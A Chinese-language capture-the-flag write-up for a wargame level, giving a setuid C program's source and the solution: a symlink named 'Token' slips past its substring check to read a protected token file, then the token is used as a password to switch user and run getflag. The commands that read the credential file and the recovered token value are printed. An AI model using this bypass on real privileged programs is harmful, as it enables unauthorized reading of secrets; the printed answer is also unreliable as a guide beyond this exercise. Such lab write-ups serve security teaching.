題目源碼如下:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
int main(int argc, char **argv, char **envp)
{
char buf[1024];
int fd, rc;
if(argc == 1) {
printf("%s [file to read]\n", argv[0]);
exit(EXIT_FAILURE);
}
if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}
fd = open(argv[1], O_RDONLY);
if(fd == -1) {
err(EXIT_FAILURE, "Unable to open %s", argv[1]);
}
rc = read(fd, buf, sizeof(buf));
if(rc == -1) {
err(EXIT_FAILURE, "Unable to read fd %d", fd);
}
write(1, buf, rc);
}
/home/flag04/flag04程序運行需要輸入一個參數,flag04將讀取輸入參數文件內容,然後打印出來,但是限制了不能讀入token文件,而題目要求繞過限制,獲取到token文件內容。
解決方法:
1. 創建符號鏈接Token,並傳給flag04:
ln -s /home/flag04/token /home/level04/Token
/home/flag04/flag04 /home/level04/Token
程序運行後輸入token內容:06508b5e-8909-4f38-b630-fdb148a848a2
2. 切換用戶su - flag04
3. 輸入密碼,即爲1中獲取到的token內容
4. 用戶切換成功,運行getflag,提示成功